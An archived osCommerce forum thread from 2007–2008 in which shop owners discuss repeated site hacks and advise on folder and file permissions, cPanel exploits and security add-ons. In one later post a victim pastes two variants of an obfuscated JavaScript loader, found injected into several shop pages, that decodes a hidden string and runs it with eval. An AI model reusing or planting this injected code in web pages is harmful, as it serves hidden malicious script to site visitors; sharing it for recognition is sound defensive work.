Guest Posted November 16, 2007 Share Posted November 16, 2007 Morning, We have been building online shops with oscommerce for a couple of years now and never had any problems. Until this summer. Since summer though, many of our shops have been attacked, some using the vulnerability of the 777 directories and other smaller vulnerabilities which we have now fixed but now we just had another one with an SQL injection. It seems like a never-ending attack at the moment, one thing fixed, another one attacked... Do others notice an increase in (successful) attacks, too? Or is it just me... I don't know what to do and where to start, anyone had a similar situation? Thank you, Anuschka Link to comment Share on other sites More sharing options...
♥Vger Posted November 16, 2007 Share Posted November 16, 2007 No folder should have permissions higher than 755, because 777 are FULL permissions for everyone! However, some hosts have their servers set up so badly that you have to have permissions of 777 on folders for your site to work - the answer, if they won't correct that, is find a new host!. Saying that a site has been hacked when folders have permissions of 777 is like saying that your house was robbed when you left the back door wide open. You should also be aware that many sites get hacked via an exploitation of the server. cPanel in particular is vulnerable to this sort of attack and gets exploited between 2 and 4 times a year, on average. Vger Link to comment Share on other sites More sharing options...
Guest Posted November 18, 2007 Share Posted November 18, 2007 what was the second attack from, how did they exploit? Link to comment Share on other sites More sharing options...
Guest Posted November 18, 2007 Share Posted November 18, 2007 No folder should have permissions higher than 755, because 777 are FULL permissions for everyone! However, some hosts have their servers set up so badly that you have to have permissions of 777 on folders for your site to work - the answer, if they won't correct that, is find a new host!. Saying that a site has been hacked when folders have permissions of 777 is like saying that your house was robbed when you left the back door wide open. You should also be aware that many sites get hacked via an exploitation of the server. cPanel in particular is vulnerable to this sort of attack and gets exploited between 2 and 4 times a year, on average. Vger Does that apply to the backups directory and the graphs directory? Link to comment Share on other sites More sharing options...
Guest Posted November 18, 2007 Share Posted November 18, 2007 Hi there, thank you for your replies. Our shop has just been hacked again. :( We didn't even have the settings set to 777 yet - they were on 755. As I am not the developer, I have just put a html page in front of it to hide it, if you want to see the hack (it seems to be a Turkish one this time), please PM me, as I dont want to cause my customer more trouble than he has already and publicise it to Google etc. But if you have all directories set to 755, how do you get around allowing your customers to upload images to the directories, as Coopco is asking: "does this apply to the graph ones, too"? Anyway, the 777 doesnt seem to have been the problem, as that wasn't even done yet. The new version of the shop that we uploaded to amend the problem has been live for not even 4 weeks yet, and they already managed to get rid of the entire front page and say "this shop has been hacked by xyz". Oh, and yes, we do use Cpanel-based hosting. The second attack was the SQL injection, the first attack was just a few links that had been inserted onto all text-editor-based sites. Then there was another attack where someone had uploaded a malicious folder into the images folder, which seems to be our current problem. Thanks, Anuschka Link to comment Share on other sites More sharing options...
♥Vger Posted November 18, 2007 Share Posted November 18, 2007 If your folder permissions are 755 and your site got hacked, and you use cPanel then you must get your host to upgrade their version of cPanel. It doesn't matter what security you apply to osCommerce if they are geting in via cPanel - and this does sound like a cPanel exploit. Vger Link to comment Share on other sites More sharing options...
Guest Posted November 19, 2007 Share Posted November 19, 2007 Hi Vger, how do you know that it could be Cpanel, and what do I need to look out for? I have another host that we are currently testing and I'd move to them straight away but they also use Cpanel. Are there any hosting companies you recommend for OsCommerce? I just sent you a PM, I'd be interested in learning about getting the images directory to work with a 755 setting. Thank you, Anuschka Link to comment Share on other sites More sharing options...
Guest Posted November 19, 2007 Share Posted November 19, 2007 Another question - would it help if we added SSL to the entire site? Anuschka Link to comment Share on other sites More sharing options...
Guest Posted November 19, 2007 Share Posted November 19, 2007 Another question - would it help if we added SSL to the entire site?Anuschka No. Link to comment Share on other sites More sharing options...
Guest Posted November 19, 2007 Share Posted November 19, 2007 How do I find out which hosting is most secure? We have had not many nice experiences with hosting companies, either they are too big and anonymous, or not within our customers' price range. How do I know that it is Cpanel for sure, and don't move host for the wrong reasons? Thanks, anuschka Link to comment Share on other sites More sharing options...
Guest Posted November 20, 2007 Share Posted November 20, 2007 Hi, I've been using this hosting company for three years now and have had very little problems with them ( a couple downtime issues in three years). Their tech support is right on the ball and offer enough traffic and storage to meet any oscommerce site. Easy to use cpanel. The only thing is you have to add an extra IP to your account for the SSL, but its cheap enough not to be a big deal. Our all the file that need to be protected on our site are set to 644 (which is 99% of our site) and we have no hack issues. Link to comment Share on other sites More sharing options...
Guest Posted November 20, 2007 Share Posted November 20, 2007 Hi Eyekandee, thank you very much for this. My client is in the UK though and I need to keep the hosting there, too. I forgot to mention that, sorry! I found quite a few hosts in the US who are in line with whta Vger suggests but not that many in the UK. Maybe we're a bit behind on that here. :) All the best, Anuschka Link to comment Share on other sites More sharing options...
♥Vger Posted November 20, 2007 Share Posted November 20, 2007 Our all the file that need to be protected on our site are set to 644 That's the correct setting for files, but what settings do your folders have - 755 or 777 ? Also, even 755 won't protect you from a cPanel hack. Vger Link to comment Share on other sites More sharing options...
zhexiang Posted November 21, 2007 Share Posted November 21, 2007 So, all files must be set to 644? Gosh, most of my files are set to 755 by default. I should change it? Or play by luck, hope no hacking will occur? Link to comment Share on other sites More sharing options...
♥Vger Posted November 21, 2007 Share Posted November 21, 2007 All files, except for the two configure.php files,should be set to 644. The two configure.php files should be set to either 644, 444 or 400 - which setting is correct for those two files will depend on your hosting. You should not have any files set to 755 permissions (only folders). Vger Link to comment Share on other sites More sharing options...
Guest Posted November 27, 2007 Share Posted November 27, 2007 All files, except for the two configure.php files,should be set to 644. The two configure.php files should be set to either 644, 444 or 400 - which setting is correct for those two files will depend on your hosting. You should not have any files set to 755 permissions (only folders). Vger Hi, So I should set ALL FILES to 644 (in my case) except for cinfigure.php. And all folders to 755? Thanks! Link to comment Share on other sites More sharing options...
Jack_mcs Posted November 27, 2007 Share Posted November 27, 2007 Hi, So I should set ALL FILES to 644 (in my case) except for cinfigure.php. And all folders to 755? Thanks! On a properly setup server, all directories should be set to 755. All files should be set to 644, except for the configure files and some files added by some contributions. Jack Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
zhexiang Posted November 28, 2007 Share Posted November 28, 2007 Good...i'm gonna die on this one... too many files to change.. See you all in afterlife... LOL... Link to comment Share on other sites More sharing options...
Jack_mcs Posted November 28, 2007 Share Posted November 28, 2007 Depending on your control panel, there may be a way to change whole directories at one time. Or your host could do it very easily, if they will. It wouldn't hurt to ask. Jack Support Links: For Hire: Contact me for anything you need help with for your shop: upgrading, hosting, repairs, code written, etc. All of My Addons Get the latest versions of my addons Recommended SEO Addons Link to comment Share on other sites More sharing options...
Arctic Fox Posted November 30, 2007 Share Posted November 30, 2007 If I set anything to 6## that 'thing' will disappear from my FTP. For me it all has to be 7## for me to get access to it, or I have to contact my host to bring it back into view. Link to comment Share on other sites More sharing options...
♥valerif Posted December 11, 2007 Share Posted December 11, 2007 If I set anything to 6## that 'thing' will disappear from my FTP. For me it all has to be 7## for me to get access to it, or I have to contact my host to bring it back into view. hello i wonder what permission should be the sessions folder? Link to comment Share on other sites More sharing options...
sqldude Posted October 13, 2008 Share Posted October 13, 2008 Just wanted to share a script that appeared in several of our pages yesterday that caused our osC shop to stop loading on computers with any kind of decent Internet protection software (ie. Sophos and Norton Internet). It was partially our fault for not securing all of the directories and files but we are not web admins and did not realize that our host's one-click install did not secure the folders/files. In fairness, they did point us to the exact file and folders that were not secured so we could correct that but we had apparently already been injected at that point. So, the script that was injected had two variants: <script language=JavaScript> function nbhebn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,43,28,60,46,37,45,44,56,6,0,0,0,0 ,0,0,8,61,52,53,10,9,48,11,20,29,47,38,50,12,22,36,55,3,26,32,40,41,51,16,31,0,35 ,0,0,0,0,30,0,34,2,18,49,21,59,39,24,54,27,17,42,5,25,4,7,58,57,62,19,23,13,15,33 ,14,1);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(215^j&255);j>>=8;d-=2}else{d=6}}}eval©;}}nbhebn15('Sqj4VaGTrtqTiylTOly3taj4LbwfVaG6al17ryRsSNlJZDf0FJ4JdNl6qDfArR14Lly8SGyrPtRU Bl_A0yqTgiys8jf7Vlw68KfTLKfTquf48cGJrg17Za0T8Zy331U6Zsjs5a1Tryf0RRfT0KXUiKf78lf0s PXrgGy8Zfw0FQy8aty33QXAPQlJVyqJltsfKX0JLqG70ylqawsAOyl1fD1qCw1JO_q4iqRfraj4LNXq1Z JJdNl6qDjqFfw') </script><!-- shiandlee.org --> <script language=JavaScript> function wusrbn15(p) { var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,43,28,60,46,37,45,44,56,6,0,0,0,0 ,0,0,8,61,52,53,10,9,48,11,20,29,47,38,50,12,22,36,55,3,26,32,40,41,51,16,31,0,35 ,0,0,0,0,30,0,34,2,18,49,21,59,39,24,54,27,17,42,5,25,4,7,58,57,62,19,23,13,15,33 ,14,1);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(215^j&255);j>>=8;d-=2}else{d=6}}}eval©;}}wusrbn15('Sqj4VaGTrtqTiylTOly3taj4LbwfVaG6al17ryRsSNlJZDf0FJ4JdNl6qDfArR14Lly8SGyrPtRU Bl_A0yqTgiys8jf7Vlw68KfTLKfTquf48cGJrg17Za0T8Zy331U6Zsjs5a1Tryf0RRfT0KXUiKf78lf0s PXrgGy8Zfw0FQy8aty33QXAPQlJVyqJltsfKX0JLqG70ylqawsAOyl1fD1qCw1JO_q4iqRfraj4LNXq1Z JJdNl6qDjqFfw') </script><!-- shiandlee.org --> We found one of these scripts on the following pages just under the <body></body> tags: catalog/index.php catalog/default.php admin/index.php index333.html index3334.html So far, osC seems to be running fine with all directories at 755 and files at 644. We also reset our FTP passwords. Link to comment Share on other sites More sharing options...
Jan Zonjee Posted October 13, 2008 Share Posted October 13, 2008 Just wanted to share a script that appeared in several of our pages yesterday that caused our osC shop to stop loading on computers with any kind of decent Internet protection software Looks familiar. Link to comment Share on other sites More sharing options...
php_Guy Posted October 14, 2008 Share Posted October 14, 2008 I don't see it mentioned yet so I'll post a link... This thread lists all the security mods and discusses some of the issues. I'd recommend installing them all. Also be sure to .htpasswd protect your admin folder. Do not rely on the built in password protection. Security Mods Good luck! Link to comment Share on other sites More sharing options...
Guest Posted October 16, 2008 Share Posted October 16, 2008 I have a great hosting provider, and there's no cpanel...different one (don't want to say!) If you are interested in getting their name, pm me. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.